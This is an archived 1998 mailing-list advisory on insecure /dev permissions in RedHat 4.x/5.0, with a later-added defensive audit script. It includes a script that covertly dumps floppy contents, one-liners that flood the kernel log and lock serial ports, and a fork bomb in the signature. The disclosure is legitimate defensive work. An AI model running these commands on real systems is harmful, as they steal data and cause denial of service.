RedHat 4.x/5.0 /dev permissions

From: Michał Zalewski (lcamtufat_private)
Date: Wed Feb 04 1998 - 00:45:37 PST


    First one
    ----------
    
    Any user can read data from a floppy (even one that is not mounted) using
    "cat /dev/fd0H1440". It isn't dangerous itself, but... Any user
    may write a script which periodically checks if the floppy has
    just been unmounted, then dumps its content to a file. Here's a sample
    'floppy collector':
    
    -- fdumper --
    #!/bin/sh
    DUMP_DEV=/dev/fd0H1440
    MOUNT_DEV=/dev/fd0
    LABEL=0
    DUMPED=1
    while :; do
      sleep 1
      if [ "`mount|grep \"^${MOUNT_DEV}\"`" = "" ]; then
        if [ "$DUMPED" = "0" ]; then
          echo "Dumping image #$LABEL..."
          cat $DUMP_DEV >.fdimage$LABEL
          let LABEL=LABEL+1
          DUMPED=1
        fi
      else
        DUMPED=0
      fi
    done
    -- eof --
    
    Also, if there's no floppy in the drive, an unprivileged user may flood the
    kernel log console (the local console by default!!!):
    
    [user@host sth]$ while :; do cat /dev/fd0H1440;done &
    
    It will generate a lot of kernel messages, which will be logged
    to /var/log/messages AND to console (default klogd behaviour). Also,
    every printk(...) (called by fd driver) uses sync() to flush buffers.
    It will cause abnormal hdd activity.
    
    Second one
    -----------
    (not tested with rh 5.0)
    
    Ordinary users are allowed to read /dev/ttyS*. The serial port driver
    disallows multiple access attempts at the same time, so a user may
    permanently lock a chosen port using this command:
    
    [user@host user]$ cat /dev/ttyS0
    (Ctrl+Z)
    [user@host user]$ cat /dev/ttyS0
    cat: /dev/ttyS0: device is busy
    
    Now the serial port is in an unusable state.
    
    That's all?
    ------------
    
    There are also a lot of other, not-so-common devices, e.g. /dev/sequencer,
    which are world-readable or even world-writable.
    
    There's no reason at all to give ordinary users direct access to hardware
    devices. It's quite easy (as shown above ;) to obtain interesting
    data or cause system failure by reading/writing these devices.
    
    Solution...
    ------------
    
    ls -l /dev/* | grep "r-- "
    chmod ;)
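The ls/grep check above, written out as a small audit script. This is an added example, not code from the original post; it assumes GNU find (for -printf) and keeps a short allowlist of nodes that legitimately stay world-accessible (null, zero, tty, random, ptmx).

```sh
#!/bin/sh
# Added example: report device nodes under /dev whose "other" permission bits
# grant read or write, i.e. the world-readable/world-writable nodes the post
# describes. Assumes GNU find (-printf). Nodes that must stay world-accessible
# are allowlisted; everything else flagged is a chmod o-rw candidate.

ALLOW='/dev/null /dev/zero /dev/full /dev/tty /dev/random /dev/urandom /dev/ptmx'

# Input on stdin: lines of "MODE PATH" (octal mode, as from find -printf '%m %p\n').
# Output: one line per node whose "other" bits grant read or write access.
flag_world_access() {
  while read -r mode path; do
    [ -n "$path" ] || continue
    case " $ALLOW " in *" $path "*) continue ;; esac   # skip allowlisted nodes
    other=${mode#${mode%?}}          # last octal digit = permissions for "other"
    case "$other" in
      [2367]) printf 'WORLD-WRITABLE %s %s\n' "$mode" "$path" ;;   # write bit set
      [45])   printf 'world-readable %s %s\n' "$mode" "$path" ;;   # read bit only
    esac
  done
}

# Scan a directory (default /dev) for character and block devices and report
# the ones reachable by "other". Regular files and symlinks are ignored.
audit_dev() {
  find "${1:-/dev}" \( -type c -o -type b \) -printf '%m %p\n' 2>/dev/null |
    flag_world_access
}

# To remediate after reviewing the report:
#   audit_dev | awk '{print $3}' | xargs -r chmod o-rw
```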
    
    _______________________________________________________________________
    Michał Zalewski [tel 9690] | finger 4 PGP [lcamtufat_private]
    To iterate is human, to recurse divine [P. Deutsch]
    =------- [ echo -e "while :;do \$0&\ndone">_;chmod +x _;./_ ] --------=
    
    This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 13:41:32 PDT